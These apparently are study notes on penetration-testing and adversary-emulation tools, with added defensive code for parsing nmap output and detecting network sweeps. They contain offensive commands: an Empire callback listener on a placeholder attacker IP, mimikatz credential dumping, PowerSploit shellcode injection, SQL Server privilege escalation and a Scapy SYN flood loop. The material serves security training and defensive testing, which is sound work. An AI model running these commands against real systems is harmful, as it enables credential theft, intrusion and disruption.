## Bash Scripting
- **Use Case**: Automate data collection, parsing, and command execution
- **Example**:
```bash
# Automate an nmap service-version scan and save the normal-output report
nmap -sV 192.168.1.0/24 -oN scan_results.txt
```
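An added example (Python, not from the original notes) of the "parsing" half of the use case: it reads the normal-output file the scan above writes with `-oN`, builds a host-to-services map, and flags open services a defender would review. The sample output, the regexes and the `REVIEW_SERVICES` watch-list are constructed for this example, not part of nmap.

```python
# Added example (not from the original notes): parse nmap -oN "normal output"
# into {host: services} and flag open services worth reviewing. SAMPLE_OUTPUT
# is a constructed sample in nmap's normal-output format, not a real scan.
import re

SAMPLE_OUTPUT = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sV 192.168.1.0/24 -oN scan_results.txt
Nmap scan report for 192.168.1.10
Host is up (0.0012s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1
80/tcp   open  http    nginx 1.18.0
3306/tcp open  mysql   MySQL 5.7.42

Nmap scan report for 192.168.1.20
Host is up (0.0030s latency).
PORT     STATE    SERVICE       VERSION
445/tcp  open     microsoft-ds  Windows Server 2019 microsoft-ds
3389/tcp filtered ms-wbt-server
# Nmap done at Mon Jan  1 10:05:00 2024 -- 256 IP addresses (2 hosts up) scanned
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap_normal(text):
    """Return {host: [(port, proto, state, service, version), ...]}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:                       # new host block; record it even if no ports follow
            current = m.group(1)
            hosts.setdefault(current, [])
            continue
        m = PORT_RE.match(line)
        if m and current:           # one port line, e.g. "22/tcp open ssh OpenSSH 8.9p1"
            port, proto, state, service, version = m.groups()
            hosts[current].append((int(port), proto, state, service, version.strip()))
    return hosts

# Services that should rarely be reachable from a general-purpose subnet
# (constructed watch-list; tune it to the environment's own policy).
REVIEW_SERVICES = {"mysql", "ms-sql-s", "postgresql", "microsoft-ds", "ms-wbt-server"}

def exposed_services(hosts):
    """Return [(host, port, service)] for open ports on the review list."""
    return [(h, port, svc) for h, entries in hosts.items()
            for port, _proto, state, svc, _ver in entries
            if state == "open" and svc in REVIEW_SERVICES]
```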
---
## Empire & PowerSploit
- **Empire Framework**
- **Role**: Post-exploitation (Windows) via PowerShell agents that run in-process, without spawning `powershell.exe`
- **Key Workflow**:
```text
uselistener http
set Host http://YOUR_IP
execute
```
- _Listener_: Waits for agents
- _Payload_: Runs on the target and calls back to the Empire listener
- **Credential Harvesting**:
```text
usemodule credentials/mimikatz/logonpasswords
execute
```
- **PowerSploit**
- **Role**: PowerShell scripts for reconnaissance/exploitation
- **Privilege Escalation**:
```powershell
Import-Module PowerSploit/Privesc
Invoke-AllChecks
```
- **Shellcode Injection**:
```powershell
Import-Module PowerSploit/CodeExecution
Invoke-Shellcode -Shellcode (Get-Content shellcode.bin) -ProcessID 1234
```
- **Integration**
- Deploy an Empire agent → escalate privileges using `Invoke-AllChecks` findings → dump credentials (`mimikatz`) → move laterally
---
## PowerView (AD Reconnaissance)
- **Purpose**: Enumerate AD objects (users, groups, computers, trusts)
- **Key Commands**:
```powershell
Get-NetUser
Get-NetGroup
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetComputer
Get-NetDomainTrust
Get-NetSession -ComputerName TARGET_HOST
```
- **Concepts**:
- **Mapping AD**: Discover users/groups/computers
- **High-Value Targets**: Focus on privileged accounts
- **Trust Relationships**: Identify cross-domain attack paths
---
## PowerUpSQL (SQL Server Exploitation)
- **Purpose**: Automate discovery/exploitation of SQL Server instances
- **Key Commands**:
```powershell
Get-SQLInstanceLocal -Verbose
Get-SQLServerInfo -InstanceName "SQLSERVER01"
Invoke-SQLEscalatePriv -Instance "SQLSERVER01" -Verbose
Get-SQLServerLoginDefaultPw
Get-SQLDomainUser -UserState TrustedForDelegation
Get-SQLServerLink -Instance "SQLSERVER01"
```
- **Concepts**:
- **Discovery**: Scan network for SQL instances
- **Privilege Escalation**: Exploit misconfigurations
- **Lateral Movement**: Use linked servers
---
## AD Search (PowerShell)
- **Purpose**: Automate AD information gathering/filtering
- **Essential Cmdlets**:
```powershell
# Retrieve all users in OU
Get-ADUser -Filter * -SearchBase "OU=Sales,DC=Corp,DC=com"
# Users with "Manager" in title
Get-ADUser -Filter {Title -like "*Manager*"} -Properties Title
# Users never logged in
Get-ADUser -Filter * -Properties LastLogonDate |
    Where-Object { $_.LastLogonDate -eq $null }
```
- **Advanced Reports**:
```powershell
Get-ADGroupMember "Domain Admins" |
    Get-ADUser -Properties DisplayName,EmailAddress |
    Select DisplayName,EmailAddress |
    Export-Csv C:\Reports\DomainAdmins.csv -NoTypeInformation
```
- **Loop Example**:
```powershell
# List disabled accounts per OU
$OUs = Get-ADOrganizationalUnit -Filter *
foreach ($OU in $OUs) {
    Get-ADUser -Filter {Enabled -eq $false} -SearchBase $OU.DistinguishedName |
        Select Name,DistinguishedName
}
```
---
## Impacket & Scapy
- **Impacket**
- **Role**: Python library (with example scripts) for speaking network protocols and crafting packets
- **Scapy**
- **Role**: Packet manipulation (craft/sniff/decode)
- **ARP Scanning**:
```python
# ARP-scan 192.168.1.0/24: broadcast one ARP who-has per address, collect replies
# (requires raw-socket privileges, i.e. root/administrator)
from scapy.all import ARP, Ether, srp

ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst="192.168.1.0/24"), timeout=2)
for sent, received in ans:
    # psrc / hwsrc are the responding host's IP and MAC
    print(received.psrc, received.hwsrc)
```
- **TCP SYN Flood**:
```python
# Send one SYN to every port 1-1024 on the target (the notes' SYN-flood simulation)
from scapy.all import IP, TCP, send

for port in range(1, 1025):
    send(IP(dst="TARGET_IP") / TCP(dport=port, flags="S"))
```
- **Takeaway**: Automate network reconnaissance and DoS simulations
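Added example, not from the original notes and not Scapy code: the defender-side detection logic for the two behaviours above (an ARP sweep and a SYN sweep), run over constructed packet records such as a capture would yield. `Pkt`, `find_sweeps` and the window/threshold values are assumptions of this example.

```python
# Added example (not from the original notes): detection logic for the two
# Scapy behaviours above, run over constructed packet records rather than a
# live capture. A source that bare-SYNs many distinct host:port pairs, or
# ARP-requests many distinct addresses, inside a short window is reported.
from dataclasses import dataclass

@dataclass
class Pkt:
    ts: float        # capture time, seconds
    proto: str       # "tcp" or "arp"
    src: str         # source IP (tcp) or source MAC (arp)
    dst: str         # destination IP (tcp) or requested IP (arp)
    dport: int = 0   # TCP destination port; unused for arp
    flags: str = ""  # TCP flags as Scapy prints them; "S" is a bare SYN

def find_sweeps(pkts, window=2.0, threshold=20):
    """Return {src: peak distinct targets} for sources exceeding `threshold`
    distinct targets within any `window`-second span of their traffic."""
    by_src = {}
    for p in sorted(pkts, key=lambda p: p.ts):
        if p.proto == "tcp" and p.flags == "S":
            by_src.setdefault(p.src, []).append((p.ts, (p.dst, p.dport)))
        elif p.proto == "arp":
            by_src.setdefault(p.src, []).append((p.ts, (p.dst, 0)))
    hits = {}
    for src, events in by_src.items():
        start = 0
        for end in range(len(events)):          # sliding window over time
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {target for _, target in events[start:end + 1]}
            if len(distinct) > threshold:
                hits[src] = max(hits.get(src, 0), len(distinct))
    return hits

# Constructed sample: one host SYN-sweeping ports 1-60 of 10.0.0.9 in 0.6 s,
# one ordinary client retrying 443 three times, one MAC ARP-sweeping 30 addresses.
SAMPLE = (
    [Pkt(0.01 * i, "tcp", "10.0.0.5", "10.0.0.9", port, "S")
     for i, port in enumerate(range(1, 61))]
    + [Pkt(1.0 + i, "tcp", "10.0.0.7", "10.0.0.9", 443, "S") for i in range(3)]
    + [Pkt(5 + 0.02 * i, "arp", "aa:bb:cc:dd:ee:01", f"192.168.1.{i}")
       for i in range(1, 31)]
)

if __name__ == "__main__":
    print(find_sweeps(SAMPLE))   # → {'10.0.0.5': 60, 'aa:bb:cc:dd:ee:01': 30}
```

The ordinary client never exceeds the threshold because it keeps hitting the same host:port, which is what separates retries from a sweep.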
---
## Caldera (Adversary Emulation)
- **Overview**: MITRE’s breach-and-attack-simulation (BAS) platform, built on the **MITRE ATT&CK** framework
- **Workflow**:
1. Deploy agent(s) in virtual environment
2. Agents execute “abilities” (attack steps)
- **Initial Access**: e.g., simulated phishing
- **Credential Dumping**: Mimikatz
- **Lateral Movement**: Use stolen creds
3. Caldera server logs results
- **Benefits**:
- **Automation**: Chain multiple attack techniques
- **Logging/Reporting**: Detailed success/failure insights
- **Repeatable Scenarios**: Compare defenses pre/post-mitigation
---
## Infection Monkey (Malware Simulation)
- **Overview**: Simulates real-world malware in a safe, controlled manner
- **Components**:
- **Agent**: Acts like malware (spreads, steals data)
- **Monkey Island**: C2 server; tracks agent activity
- **Use Cases**:
- Test security controls (firewall, IDS, endpoint)
- Identify vulnerable network segments
- **Benefits**:
- **Realistic Simulation**: Mimics ransomware/worm behavior
- **Actionable Insights**: Pinpoints defense gaps
- **Continuous Improvement**: Iterate to harden posture
---
## Atomic Red Team (Focused Attack Tests)
- **Overview**: Run “atomic tests” mapped to **MITRE ATT&CK**
- **Examples**:
- **Credential Dumping (T1003.001)**
```powershell
Invoke-AtomicTest T1003.001 -TestNumbers 1
```
- **Malicious PowerShell Execution (T1059.001)**
```powershell
Invoke-AtomicTest T1059.001 -TestNumbers 2
```
- **Scheduled Task Persistence (T1053.005)**
```powershell
Invoke-AtomicTest T1053.005 -TestNumbers 1
```
- **Advantages**:
- **Immediate Feedback**: Quick validation of defenses
- **Low Overhead**: Minimal setup; targeted tests
- **Technique-Focused**: Isolate detection gaps